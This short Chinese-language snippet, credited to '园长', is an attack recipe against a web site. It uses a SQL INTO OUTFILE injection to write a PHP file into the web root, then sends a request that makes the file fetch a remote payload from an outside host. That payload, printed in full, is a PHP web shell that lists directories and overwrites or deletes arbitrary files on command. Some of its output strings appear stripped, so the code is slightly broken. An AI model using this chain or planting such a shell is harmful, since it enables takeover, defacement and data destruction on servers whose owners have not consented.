author:园长
sql:
select '' into outfile'/var/www/html/xxx/data/conf_ads.php'
GET:
http://www.XXX.com.cn/data/conf_ads.php?file=admin3.php&url=http://p2j.cn/1.txt
1.txt:
";
function getFile($path,$charset) {
header("Content-Type:text/html;charset=".$charset);
if (is_dir($path)) {
$dir = opendir ( $path );
while ( $file = readdir ( $dir ) ) {
echo "".$file."
";
}
closedir($dir);
} else {
echo "File:
";
echo "";
}
echo "";
}
function update($filename,$data){
file_put_contents($filename, $data);
echo "";
}
if('update'==$_POST['action']){
update($_POST['file'],$_POST['data']);
}else if('delete'==$_POST['action']){
if(file_exists($_POST['file'])){
unlink($_POST['file']);
echo "";
}
}else{
getFile($_POST['p']!=''?$_POST['p']:$_SERVER['DOCUMENT_ROOT'],$_POST['charset']!=''?$_POST['charset']:"UTF-8");
}
?>